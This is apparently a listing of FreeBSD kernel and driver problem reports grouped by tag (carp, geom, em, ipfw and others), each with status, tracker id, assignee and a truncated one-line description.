o kern/132285 net [carp] alias gives incorrect hash in dmesg o kern/132107 net [carp] carp(4) advskew setting ignored when carp IP us o kern/129508 net [carp] [panic] Kernel panic with EtherIP (may be relat o kern/127050 net [carp] ipv6 does not work on carp interfaces [regressi f kern/126984 glebius [carp] [patch] add carp userland notifications via dev o kern/126945 net [carp] CARP interface destruction with ifconfig destro o kern/126714 net [carp] CARP interface renaming makes system no longer o kern/125816 net [carp] [if_bridge] carp stuck in init when using bridg f kern/125442 gonzo [carp] [lagg] CARP combined with LAGG causes system pa o kern/120130 net [carp] [panic] carp causes kernel panics in any conste o kern/117448 net [carp] 6.2 kernel crash [regression] o kern/117000 glebius [carp] CARP using address-less host NIC (carpdev) o kern/114095 pf [carp] carp+pf delay with high state limit 14 problems total. Problem reports for tag 'cbb': S Tracker Resp. Description -------------------------------------------------------------------------------- f amd64/123275 amd64 [cbb] [pcmcia] cbb/pcmcia drivers on amd64 failure [re o kern/114550 [cbb] Cardbus WiFi card activation problem f kern/96286 [cbb] [panic] TI1131 PCI CardBus Bridge: driver cbb le 3 problems total. Problem reports for tag 'cd9660': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/130941 gavin [panic] [cd9660] [geom] unexpected crash due to page f o kern/114955 fs [cd9660] [patch] [request] support for mask,dirmask,ui 2 problems total. Problem reports for tag 'ciss': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132250 scsi [ciss] ciss driver does not support more then 15 drive o kern/125723 [ciss] System randomly crashes or can not boot - ciss o kern/125647 [ciss] [panic] System randomly crashes - ciss driver o kern/115997 scottl [ciss] [panic] [patch?] kernel panics on heavy disk I/ o kern/109813 [ciss] ciss(4) driver API header is not installed 5 problems total. Problem reports for tag 'cpufreq': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128335 [patch] [cpufreq] Missing call to sbuf_delete() in two o amd64/122695 amd64 [cpufreq] Lack of cpufreq control using amd64 eith cor o kern/121768 [cpufreq] cpufreq module RELENG_6 -> 7 regressions on o kern/118739 [cpufreq] [patch] Allow the cpufreq/p4tcc driver to de o amd64/114270 amd64 [cpufreq] cpufreq doesnt work when compiled in to kern 5 problems total. Problem reports for tag 'crypto': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132277 net [crypto] [ipsec] poor performance using cryptodevice f o kern/132129 [crypto] Device crypto makes the kernel unbootable o kern/120270 simon [crypto] [patch] AES-192 and AES-256 support for HW-ac o kern/115695 [crypto] When "device padlock" defined first ssh to ma f kern/114331 vanhu [crypto] [patch] VIA padlock freesession bug o bin/93776 [crypto] [patch] SHA256_Update / SHA512_Update fail to o kern/91407 [crypto] [panic] Kernel panic when heavily loading cry o kern/66029 [crypto] [patch] MD5 alignment problem on a TriMedia p o kern/43611 [crypto] [patch] static-ize some symbols in sys/crypto 9 problems total. Problem reports for tag 'cue': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/75710 [cue] cue0 device configuration causes kernel panic 1 problem total. Problem reports for tag 'cx': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/66348 rik [cx] FR mode of cx (Cronyx Sigma) does not work for 4. 1 problem total. Problem reports for tag 'cxgb': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125806 kmacy [cxgb] cxgb packet counters do not work 1 problem total. Problem reports for tag 'cy': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/126098 [cy] 6.3 only sees 16 ports on 32 port Cyclades Cyclom 1 problem total. Problem reports for tag 'dc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/121761 [cardbus] [dc] a cardbus dc0 causes a system freeze wh o kern/121759 [cardbus] [dc] cardbus dc0 initialization failure at o o kern/119205 [dc] [patch] Collect various stats regarding dc(4) int s kern/92279 net [dc] Core faults everytime I reboot, possible NIC issu o kern/82070 [dc] Not all dc(4) devices can be used: MII without an f kern/79262 net [dc] Adaptec ANA-6922 not fully supported o kern/55793 [dc] Flaky behavior of if_dc when initializing a LNE10 f kern/52980 mbr [dc] [patch] dc driver fails to init Intel 21143 Cardb o kern/50574 mbr [dc] dc driver incorrectly detects ADMtek chip model o kern/30052 mbr [dc] [patch] dc driver queues outgoing pkts indefinite 10 problems total. Problem reports for tag 'de': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133495 [de] interface not properly initialized on boot o kern/71450 [de] de(4): MAC address change on 21040 "Tulip" Ethern a kern/55542 andre [de] [patch] discard oversize frame (ether type 800 fl 3 problems total. Problem reports for tag 'devctl': S Tracker Resp. Description -------------------------------------------------------------------------------- a kern/130107 dfr [devctl] [patch] in devctl_queue_data(): possible use 1 problem total. Problem reports for tag 'devd': S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/120406 rc [devd] [patch] Handle newly attached pcm devices (eg. 1 problem total. Problem reports for tag 'devfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125034 [devfs] [patch] devfs does not apply rules to newly cr o kern/125030 [devfs] [patch] Command 'devfs ruleset 0' causes panic o kern/124881 [devfs] [patch] [request] Add possibility to check whi o kern/123287 [devfs] structure used after freed in destroy_devl() i o kern/122838 [devfs] devfs doesn't handle complex paths (like zvol/ o kern/122615 [devfs] [panic] occasional crash/boot while running Xo o kern/114057 [devfs] devfs symlink over device doesn't work o conf/91342 [devfs] Errors in devfs.rules files don't get logged o kern/87836 [devfs] If using ATAPICAM with cd(dvd)rw without media o kern/85751 [devfs] [panic] panic in devfs_setattr() when running 10 problems total. Problem reports for tag 'devfs.rules': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/124853 gonzo [devfs.rules] [patch] devfs_ruleset_use may use freed 1 problem total. Problem reports for tag 'digi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125454 [digi] [patch] device digi (PC/Xe 64K 16 ports) not wo o kern/83254 [digi] driver can't init Digiboard PC/4e o kern/82227 [digi] Xem: chained concentrators not recognised o kern/74281 [digi] digi(4): Digiboard PCI Xem (64-ports) detection p kern/55018 andre [digi] [patch] Digiboard PC/Xem fails to initialize wh 5 problems total. Problem reports for tag 'diskless': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/87586 [diskless] [vm] [panic] Unable to use networked swap i 1 problem total. Problem reports for tag 'dns': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/103464 bz [dns] [jail] jail networking failures to 127.0.0.1 onl 1 problem total. Problem reports for tag 'dpt': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/38828 scsi [dpt] [request] DPT PM2012B/90 doesn't work 1 problem total. Problem reports for tag 'dri': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/123775 [dri] DRI Broken under freebsd7-stable/i386 o kern/119507 [dri] mach64.o kernel module version is 1.0.0, but ver o kern/107342 [dri] Radeon dri breaks system o amd64/97337 amd64 [dri] xorg reboots system if dri module is enabled 4 problems total. Problem reports for tag 'drm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134800 [drm] radeon driver freezes Xorg server with drmwtq p kern/132042 rnoland [drm] [panic] drm module crash the system when closing o kern/128648 [drm] [hang] crash when using 3D-acceleration with Int o kern/126937 rnoland [drm] System hang when start X o kern/126113 rnoland [drm] Issues with DRM with Intel GM965 chipset o kern/125808 rnoland [drm] [patch] Radeon X800 GTO - *ERROR* Offset failed f kern/121550 [drm] Can't config graphics for ATI Radeon Xpress 200M o kern/120970 rnoland [drm] Radeon Problems related to DRM and/or DRI o kern/120262 rnoland [drm] "0MB"; no dri with i915G [regression] o kern/116435 [drm] drm/i915 reports memory leak o kern/114995 [drm] acpi_video prevents savage drm from loading succ o kern/114677 [drm] Xorg will not run with dri glx and drm on ATI Ra o kern/114546 [drm] [panic] Sleeping thread owns a non-sleepable loc o kern/114406 [drm] ATI Radeon Mobility X600 not supported by agp de o kern/94823 [drm] DRM doesnt't work with i915.ko o kern/93770 [drm] ati 9600 PRO radeon not recognized by the system o kern/90237 [drm] [panic] panic in sis DRM s kern/87653 [drm] ATI Radeon Mobile X600SE not detected by kernel o kern/82064 [drm] DRM not working with SMP 19 problems total. Problem reports for tag 'dtrace': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134408 [dtrace] [panic] "opensnoop" DTrace script panics ever o kern/130998 [dtrace] DTrace stops tracing because of struct thread o kern/127441 jb [dtrace] Dtrace timestamp variable is wrapping as if d o kern/127440 jb [dtrace] Dtrace arg0/arg1 variables don't contain retu 4 problems total. Problem reports for tag 'dummynet': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134157 net [dummynet] dummynet loads cpu for 100% and make a syst o kern/133969 net [dummynet] [panic] Fatal trap 12: page fault while in o kern/133968 net [dummynet] [panic] dummynet kernel panic o kern/121382 ipfw [dummynet]: 6.3-RELEASE-p1 page fault in dummynet (cor f kern/118128 oleg [dummynet] Dummynet cause kernel trap or system freeze o kern/106316 net [dummynet] dummynet with multipass ipfw drops packets o kern/76539 [dummynet] [patch] ipnat + dummynet on output on same 7 problems total. Problem reports for tag 'ecmp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123992 qingli [ecmp] ECMP does not remove/disable next-hop for downe p kern/123991 qingli [ecmp] ECMP balancing issues 2 problems total. Problem reports for tag 'ed': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/122195 net [ed] Alignment problems in if_ed o kern/85493 imp [ed] [patch] OLDCARD can't probe ed driver o kern/84202 net [ed] [patch] Holtek HT80232 PCI NIC recognition on Fre o kern/80853 net [ed] [patch] add support for Compex RL2000/ISA in PnP p i386/12088 imp [ed] [patch] ed(4) has minor problem with memory alloc o kern/9570 dfr [ed] [patch] ed(4) irq config enhancement 6 problems total. Problem reports for tag 'editline': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/124822 [editline] [patch] Editline's ed-search-{prev,next}-hi 1 problem total. Problem reports for tag 'ef': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/85086 wkoszek [ef] [patch] Locking fixes for ef(4) (+removes mem. le 1 problem total. Problem reports for tag 'ehci': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/122547 usb [ehci] USB Printer not being recognized after reboot o usb/115400 usb [ehci] Problem with EHCI on ASUS M2N4-SLI o usb/113672 usb [ehci] [panic] Kernel panic with AEWIN CB6971 o usb/112461 usb [ehci] [request] ehci USB 2.0 doesn't work on nforce4 o usb/105186 usb [ehci] [panic] USB 2.0/ehci on FreeBSD 6.2-PRE/AMD64 c o usb/91906 usb [ehci] [hang] FreeBSD hangs while booting with USB leg o usb/82660 usb [ehci] [panic] EHCI: I/O stuck in state 'physrd'/panic o usb/81621 usb [ehci] [hang] external hd hangs under load on ehci o usb/79722 usb [ehci] wrong alignments in ehci.h a usb/79656 usb [ehci] RHSC interrupts lost 10 problems total. Problem reports for tag 'elf': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/118540 kaiw [elf] [patch] update sys/sys/elf_common.h with new ema 1 problem total. Problem reports for tag 'em': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134079 net [em] "em0: Invalid MAC address" in FreeBSD-Current ( 8 o kern/122928 net [em] interface watchdog timeouts and stops receiving p o kern/122772 net [em] em0 taskq panic, tcp reassembly bug causes radix o kern/122373 jfv [em]: unable to recieve on em 82542 w/o promisc o kern/122058 net [em] [panic] Panic on em1: taskq o kern/121624 net [em] [regression] Intel em WOL fails after upgrade to o kern/121298 net [em] [panic] Fatal trap 12: page fault while in kernel o kern/119767 jfv [em] [patch] if_em fix for systems without msix suppor o kern/119754 jfv [em] em hung after "watchdog timeout -- resetting" on f kern/119487 [em] page fault in em taskq with polling enabled o kern/118927 jfv [em] em(4) broken: link state changed to DOWN (/UP), l o kern/118695 jfv [em] device polling + vlan causes panic on "em" interf o kern/117926 jfv [em] Intel S5000-based mobo, em driver does not attach o kern/117043 net [em] Intel PWLA8492MT Dual-Port Network adapter EEPROM o kern/115930 jfv [em]: Dell nic enumeration problem o kern/112937 jfv [em] Panic in em(4) when issuing a SIOCGIFADDR ioctl o kern/112702 jfv [em] em driver doesn't use MSI on MSI capable device o kern/104978 jfv [em] jumbo frames has been broken in RELENG_6 by last o kern/103256 jfv [em] em0: watchdog timeout -- resetting (6.1-STABLE) o i386/102562 i386 [em] no traffic pass through a em card after approx. a o kern/101226 jfv [em] Access to IPMI module is lost when the em driver o i386/98366 i386 [em] Intel PRO/1000 MT Dual PCI-X: simulatenious 1000 o amd64/92337 amd64 [em] FreeBSD 6.0 Release Intel Pro 1000 MT em1 no buff o kern/91594 net [em] FreeBSD > 5.4 w/ACPI fails to detect Intel Pro/10 o kern/80932 jfv [em] [patch] Degraded performance of em driver 25 problems total. Problem reports for tag 'est': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/133388 i386 [est] est causes wrong dev.cpu.0.freq_levels values o amd64/121590 amd64 [est] [p4tcc] [acpi_perf] setting dev.cpu.0.freq somet o i386/119946 i386 [est] sysctl dev.cpu.0.freq on 75 Hz, cannot be change o kern/119895 [est] Core2Duo CPUs not recognized by EST 4 problems total. Problem reports for tag 'ex': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/85423 i386 [ex] ex(4) does not correctly recognize NIC in PnP mod o kern/52623 [ex] [patch] IRQ error in driver for the Intel EtherEx 2 problems total. Problem reports for tag 'exp-run': S Tracker Resp. Description -------------------------------------------------------------------------------- o ports/135334 portmgr [exp-run] change linux defaults to Fedora 10 at 8-CURR 1 problem total. Problem reports for tag 'ext2fs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/131086 fs [ext2fs] [patch] mkfs.ext2 creates rotten partition f kern/128173 fs [ext2fs] ls gives "Input/output error" on mounted ext3 f kern/125536 fs [ext2fs] ext 2 mounts cleanly but fails on commands li o kern/122047 fs [ext2fs] [patch] incorrect handling of UF_IMMUTABLE / o kern/105093 fs [ext2fs] [patch] ext2fs on read-only media cannot be m f kern/104133 fs [ext2fs] EXT2FS module corrupts EXT2/3 filesystems o kern/77826 fs [ext2fs] ext2fs usb filesystem will not mount RW 7 problems total. Problem reports for tag 'ext3': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/124621 fs [ext3] [patch] Cannot mount ext2fs partition 1 problem total. Problem reports for tag 'fdc': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119618 [fdc] Double Density Disks do not work correctly o kern/106783 [fdc] umount of a floppy disk results in a reboot o kern/104079 [fdc] [patch] kldunload fdc.ko leads to panic: mutex G o kern/103862 [fdc] [patch] Error with fdformat on -CURRENT o kern/97517 [fdc] Floppy device lost permissions when active flopp o kern/97381 [fdc] [patch] Patch to add zero-sector and spanned-sid s kern/97266 [fdc] System hangs at kernel time after boot: /dev/fd0 f kern/91476 gavin [fdc] [patch] floppy drive doesn't work in MS Virtual o kern/84799 [fdc] [patch] can't read beyond track 0 on fdc (IBM th o kern/79944 [fdc] virtual floppy controller of Virtual PC does not s kern/75233 [fdc] breaking fdformat /dev/fd0 resets device permiss o kern/74827 [fdc] Problem writing data to floppies o kern/73961 [fdc] floppy disk drive performance problem [new in 5. o kern/66960 [fdc] [patch] filesystems not unmounted during reboot 14 problems total. Problem reports for tag 'ffs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133980 fs [panic] [ffs] panic: ffs_valloc: dup alloc o amd64/133977 amd64 [panic] [ffs] "panic: ffs_blkfree: freeing free block" o kern/123778 vwe [panic] [ffs] [msgs] server reboots when running 130.c o kern/122380 fs [ffs] ffs_valloc:dup alloc (Soekris 4801/7.0/USB Flash o kern/116913 fs [ffs] [panic] ffs_blkfree: freeing free block o kern/116583 fs [ffs] [hang] System freezes for short time when using o kern/92272 fs [ffs] [hang] Filling a filesystem while creating a sna 7 problems total. Problem reports for tag 'fib': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135067 net [patch] [fib] Incorrect KASSERTs in sys/net/route.c o kern/134931 net [route] [fib] Route messages sent to all socket listen o conf/132851 net [fib] [patch] allow to setup fib for service running f 3 problems total. Problem reports for tag 'fifo': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/94772 [fifo] [patch] FIFOs (named pipes) + select() == broke o kern/76525 [fifo] select() hangs on EOF from named pipe (FIFO) o kern/76144 [fifo] poll doesn't set POLLHUP when FIFO is closed 3 problems total. Problem reports for tag 'firewire': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129261 simokawa [firewire] Kernel crash on boot with disconnected fire p kern/125673 firewire [firewire] [panic] FreeBSD7 panics when kldunloading f o kern/122951 firewire [firewire] video-transfer via fwcontrol triggers a pan o kern/119575 simokawa [firewire] [patch] sbp_targ cannot handle multiple CTI o kern/118093 firewire [firewire] firewire bus reset hogs CPU, causing data t p kern/114646 firewire [firewire] [patch] firewire fails after suspend/resume o kern/113785 firewire [firewire] dropouts when playing DV on firewire o kern/97208 firewire [firewire] System hangs / locks up when a firewire dis o kern/74238 firewire [firewire] fw_rcv: unknown response; firewire ad-hoc w o kern/73313 simokawa [firewire] Maxtor Onetouch drivers hang or corrupt dat 10 problems total. Problem reports for tag 'fpa': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/101061 vwe [fpa] fea/fpa (DEC FDDI NIC) driver causes kernel pani 1 problem total. Problem reports for tag 'fs': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/122172 fs [fs]: amd(8) automount daemon dies on 6.3-STABLE i386, f kern/120991 fs [panic] [fs] [snapshot] System crashes when manipulati 2 problems total. Problem reports for tag 'fxp': S Tracker Resp. Description -------------------------------------------------------------------------------- p kern/135451 yongari [fxp] no wol capability in fxp-driver for 82801-based f kern/128181 yongari [fxp] panic in fxp_add_rfabuf f kern/126469 yongari [fxp] [panic] fxp(4) related kernel panic f kern/125195 yongari [fxp] fxp(4) driver failed to initialize device Intel o kern/124904 net [fxp] EEPROM corruption with Compaq NC3163 NIC o kern/121983 net [fxp] fxp0 MBUF and PAE o kern/114839 net [fxp] fxp looses ability to speak with traffic o kern/113427 [fxp] fxp0: device timeout when writing to USB and pla o kern/103332 yongari [fxp] fxp driver does not work correctly on Intel 8255 o kern/92675 yongari [fxp] [patch] fxp(4) unable to recover from occasional o kern/87194 net [fxp] fxp(4) promiscuous mode seems to corrupt hw-csum o kern/85258 mux [fxp] changing promisc mode on nic can lead to kernel f kern/80784 yongari [fxp] fxp gives device timeouts o kern/12543 [fxp] [patch] cumulative error counters for fxp(4) 14 problems total. Problem reports for tag 'gbde': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/119293 [gbde] gbde swap encryption forces gmirror to rebuild o kern/87544 geom [gbde] mmaping large files on a gbde filesystem deadlo o kern/66162 phk [gbde] gbde destroy error 3 problems total. Problem reports for tag 'gcclibs': S Tracker Resp. Description -------------------------------------------------------------------------------- o gnu/134604 [gcclibs] [patch] Memory leak in gcclibs/libgomp 1 problem total. Problem reports for tag 'geli': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134113 geom [geli] Problem setting secondary GELI key o kern/133931 geom [geli] [request] intentionally wrong password to destr o kern/131037 geom [geli] Unable to create disklabel on .eli-Device o kern/120091 geom [geom] [geli] [gjournal] geli does not prompt for pass o kern/120090 [geli] geli boot password input fails when using usb k o kern/120066 [geli] geli boot password input fail when using serial o kern/117188 [geli] System crashes/reboots on access to file on GEL o bin/116782 [geli] geli not updated on migrate from 6.1 to 6.2 rel o kern/115856 geom [geli] ZFS thought it was degraded when it should have o kern/111967 [geli] glabel - label is seemingly not written to disk o amd64/110599 amd64 [geli] geli attach to gmirror device hangs and cannot o kern/105368 [geli] geli passphrase prompt malfunctioning when moun o conf/102700 rc [geli] [patch] Add encrypted /tmp support to GELI/GBDE o kern/88601 geom [geli] geli cause kernel panic under heavy disk usage 14 problems total. Problem reports for tag 'geode': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/128014 i386 [geode] [patch] AMD Geode CS5536 watchdog(9) not disab o i386/98215 i386 [geode] [regression] FreeBSD can no longer boot Geode 2 problems total. Problem reports for tag 'geom': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135898 geom [geom] Severe filesystem corruption - large files or l o kern/135874 geom [geom] [patch] geom_linux_lvm misses newer fedora defa o kern/134044 geom [geom] gmirror(8) overwrites fs with stale data from r o bin/132845 geom [geom] [patch] ggated(8) does not close files opened a o kern/131353 geom [geom] gjournal(8) kernel lock f kern/130941 gavin [panic] [cd9660] [geom] unexpected crash due to page f o kern/129674 geom [geom] gjournal root did not mount on boot o kern/129245 geom [geom] gcache is more suitable for suffix based provid o kern/126902 geom [geom] geom_label: kernel panic during install boot o kern/124294 geom [geom] gmirror(8) have inappropriate logic when workin o kern/123122 geom [geom] GEOM / gjournal kernel lock o kern/122738 geom [geom] gmirror list "losts consumers" after gmirror de f kern/122415 geom [geom] UFS labels are being constantly created and rem o kern/122067 geom [geom] [panic] Geom crashed during boot o kern/121559 geom [patch] [geom] geom label class allows to create inacc o kern/120231 geom [geom] GEOM_CONCAT error adding second drive o kern/120091 geom [geom] [geli] [gjournal] geli does not prompt for pass o kern/120044 geom [msdosfs] [geom] incorrect MSDOSFS label fries adminis o kern/120021 geom [geom] [panic] net-p2p/qbittorrent crashes system when o kern/119743 geom [geom] geom label for cds is keeped after dismount and p kern/116896 geom [geom] [patch] Typo in a kassert in GEOM o kern/115547 geom [geom] [patch] [request] let GEOM Eli get password fro o kern/114532 geom [geom] GEOM_MIRROR shows up in kldstat even if compile o kern/113837 geom [geom] unable to access 1024 sector size storage o kern/113419 geom [geom] geom fox multipathing not failing back o kern/107707 geom [geom] [patch] [request] add new class geom_xbox360 to o kern/104389 geom [geom] [patch] sys/geom/geom_dump.c doesn't encode XML o kern/98034 geom [geom] dereference of NULL pointer in acd_geom_detach o kern/94632 geom [geom] Kernel output resets input while GELI asks for o kern/90582 geom [geom] [panic] Restore cause panic string (ffs_blkfree o kern/89546 geom [geom] GEOM error s kern/89102 geom [geom] [panic] panic when forced unmount FS from unplu o kern/84556 geom [geom] [panic] GBDE-encrypted swap causes panic at shu o kern/78114 phk [geom] [patch] Solaris/x86 label structures for GEOM ( 34 problems total. Problem reports for tag 'gif': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127815 net [gif] [patch] if_gif does not set vlan attributes from p kern/125003 hrs [gif] incorrect EtherIP header format. o kern/121642 bz [ipsec] [gif]: When using IPSec, tcpdump shows non-dec o kern/121443 net [gif] [lor] icmp6_input/nd6_lookup f kern/108197 jinmei [panic] [gif] [ip6] if_delmulti reference counting pan o conf/97014 [gif] gifconfig_gif? in rc.conf does not recognize IPv o conf/96094 [gif] startup scripts do not configure gif interfaces o kern/95532 [gif] if_gif has artificial limitations 8 problems total. Problem reports for tag 'gjournal': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127420 fs [gjournal] [panic] Journal overflow on gmirrored gjour o kern/124973 geom [gjournal] [patch] boot order affects geom_journal con o kern/123962 geom [panic] [gjournal] gjournal (455Gb data, 8Gb journal), o kern/120091 geom [geom] [geli] [gjournal] geli does not prompt for pass 4 problems total. Problem reports for tag 'glxsb': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132622 philip [glxsb] [patch] glxsb(4) performs badly with ipsec 1 problem total. Problem reports for tag 'gmirror': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134922 geom [gmirror] [panic] kernel panic when use fdisk on disk o kern/132242 geom [gmirror] gmirror.ko fails to fully initialize f kern/128276 geom [gmirror] machine lock up when gmirror module is used o kern/124130 geom [gmirror] [usb] gmirror fails to start usb devices tha o kern/123630 geom [patch] [gmirror] gmirror doesnt allow the original dr o kern/121481 geom [gmirror] data rot on disk with gmirror o kern/121364 geom [gmirror] Removing all providers create a "zombie" mir o kern/113957 geom [gmirror] gmirror is intermittently reporting a degrad o kern/113885 geom [gmirror] [patch] improved gmirror balance algorithm 9 problems total. Problem reports for tag 'gre': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125239 net [gre] kernel crash when using gre f kern/122065 bz [ipsec] [gre] gre over ipsec not working o kern/114714 thompsa [gre] [patch] gre(4) is not MPSAFE and does not suppor o conf/111557 [gre] link1 flag doesn't work as intended when specifi p kern/85320 gonzo [gre] [patch] possible depletion of kernel stack in ip s kern/47813 [gre] pseudo-device gre(4) doesn't appear to work with 6 problems total. Problem reports for tag 'gssapi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134010 [gssapi][patch] Buffer overflow and use-after-free in 1 problem total. Problem reports for tag 'handbook': S Tracker Resp. Description -------------------------------------------------------------------------------- o docs/132718 doc [handbook] Information about adding a new mirror is ou o docs/132113 doc [handbook] Update handbook jails creation o docs/121585 doc [handbook] Wrong multicast specification 3 problems total. Problem reports for tag 'headers': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127623 [headers] header definition for cftime is missing. o kern/126076 [headers] POLL_ERR and POLL_HUP are defined identicall o kern/117510 [headers] [patch] sys/cdefs.h lacks support for PCC o kern/113256 [headers] _limits.h for some CPU has wrong definitions o kern/112938 [headers] [patch] utmp.h is too limiting for modern sy o bin/106355 [headers] macros in stdio.h non-portable (e.g., C++ :: o stand/104743 standards [headers] [patch] Wrong values for _POSIX_ minimal lim o kern/103022 cperciva [headers] /usr/include/crypto/rijndael.h is wrong o stand/96016 standards [headers] clock_getres et al should be in o kern/93705 standards [headers] [patch] ENODATA and EGREGIOUS (for glibc com o stand/92362 standards [headers] [patch] Missing SIGPOLL in kernel headers o kern/84981 [headers] [patch] header protection for -interfac a kern/122565 bz [ipsec] [ip6] Possible memory overwrite for IPv6 IPsec s conf/121812 [ip6] [request] ipv6_gateway_enable incorrectly disabl f kern/119516 net [ip6] [panic] _mtx_lock_sleep: recursed on non-recursi o kern/118880 bz [ip6] IP_RECVDSTADDR & IP_SENDSRCADDR not implemented o docs/114371 doc [patch] [ip6] rtadvd.con(5) should show how to adverti a kern/113842 bz [ip6] PF_INET6 proto domain state can't be cleared wit f kern/108197 jinmei [panic] [gif] [ip6] if_delmulti reference counting pan o kern/100219 bz [ip6] IPV6_PKTOPTIONS and possible mbuf exhaustion. o kern/83778 [ip6] [patch] JPv6 cannot use Jumbo Frames o kern/77341 net [ip6] problems with IPV6 implementation 20 problems total. Problem reports for tag 'ipf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/123796 net [ipf] FreeBSD 6.1+VPN+ipnat+ipf: port mapping does not o kern/106438 net [ipf] ipfilter: keep state does not seem to allow repl o kern/101948 net [ipf] [panic] Kernel Panic Trap No 12 Page Fault - cau o kern/98978 net [ipf] [patch] ipfilter drops OOW packets under 6.1-Rel s kern/91777 net [ipf] [patch] wrong behaviour with skip rule inside an o kern/87521 net [ipf] [panic] using ipfilter "auth" keyword leads to k o kern/86103 net [ipf] Illegal NAT Traversal in IPFilter o kern/79895 net [ipf] 5.4-RC2 breaks ipfilter NAT when using netgraph o kern/78090 net [ipf] ipf filtering on bridged packets doesn't work if o kern/77273 net [ipf] ipfilter breaks ipv6 statefull filtering on 5.3 s kern/77195 net [ipf] [patch] ipfilter ioctl SIOCGNATL does not match o kern/70904 net [ipf] ipfilter ipnat problem with h323 proxy support o kern/34665 net [ipf] [hang] ipfilter rcmd proxy "hangs". o kern/27474 net [ipf] [ppp] Interactive use of user PPP and ipfilter c 14 problems total. Problem reports for tag 'ipfw': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135476 ipfw [ipfw] IPFW table breaks after adding a large number o o kern/132774 rwatson [ipfw] IPFW with uid/gid/jail rules may lead to lockup o kern/132553 ipfw [ipfw] ipfw doesn't understand ftp-data port o kern/131817 ipfw [ipfw] blocks layer2 packets that should not be blocke o kern/131601 ipfw [ipfw] [panic] 7-STABLE panic in nat_finalise (tcp=0) o kern/131558 ipfw [ipfw] Inconsistent "via" ipfw behavior o kern/130109 net [ipfw] Can not set fib for packets originated from loc o kern/129103 ipfw [ipfw] IPFW check state does not work =( o kern/129093 ipfw [ipfw] ipfw nat must not drop packets o kern/129036 ipfw [ipfw] 'ipfw fwd' does not change outgoing interface n o kern/128260 ipfw [ipfw] [patch] ipfw_divert damages IPv6 packets o kern/127230 ipfw [ipfw] [patch] Feature request to add UID and/or GID l o kern/127209 ipfw [ipfw] IPFW table become corrupted after many changes o bin/125370 ipfw [ipfw] [patch] increase a line buffer limit a kern/123358 [ipfw] ipfw add 1000 allow IP from any to any doesn't o kern/122963 ipfw [ipfw] tcpdump does not show packets redirected by 'ip o kern/122109 piso [ipfw] ipfw nat traceroute problem o bin/121424 doc [patch] [ipfw] Rectify ambiguous English in manual o kern/121122 ipfw [ipfw] [patch] add support to ToS IP PRECEDENCE fields o kern/118993 ipfw [ipfw] page fault - probably it's a locking problem o kern/117234 ipfw [ipfw] [patch] ipfw send_pkt() and ipfw_tick() don't s o kern/116009 ipfw [ipfw] [patch] Ignore errors when loading ruleset from p kern/115755 ipfw [ipfw] [patch] unify message and add a rule number whe p kern/113388 ipfw [ipfw] [patch] Addition actions with rules within spec o kern/112708 ipfw [ipfw] ipfw is seems to be broken to limit number of c o kern/112561 ipfw [ipfw] ipfw fwd does not work with some TCP packets o kern/107305 ipfw [ipfw] ipfw fwd doesn't seem to work o kern/105330 ipfw [ipfw] [patch] ipfw (dummynet) does not allow to set q o kern/104682 ipfw [ipfw] [patch] Some minor language consistency fixes a o kern/103454 ipfw [ipfw] [patch] [request] add a facility to modify DF b o kern/103328 ipfw [ipfw] [request] sugestions about ipfw table o kern/102471 ipfw [ipfw] [patch] add tos and dscp support o kern/98831 ipfw [ipfw] ipfw has UDP hickups o kern/97951 ipfw [ipfw] [patch] ipfw does not tie interface details to o kern/97504 ipfw [ipfw] IPFW Rules bug o kern/95084 ipfw [ipfw] [regression] [patch] IPFW2 ignores "recv/xmit/v o kern/93300 ipfw [ipfw] ipfw pipe lost packets o kern/91847 ipfw [ipfw] ipfw with vlanX as the device o kern/87032 ipfw 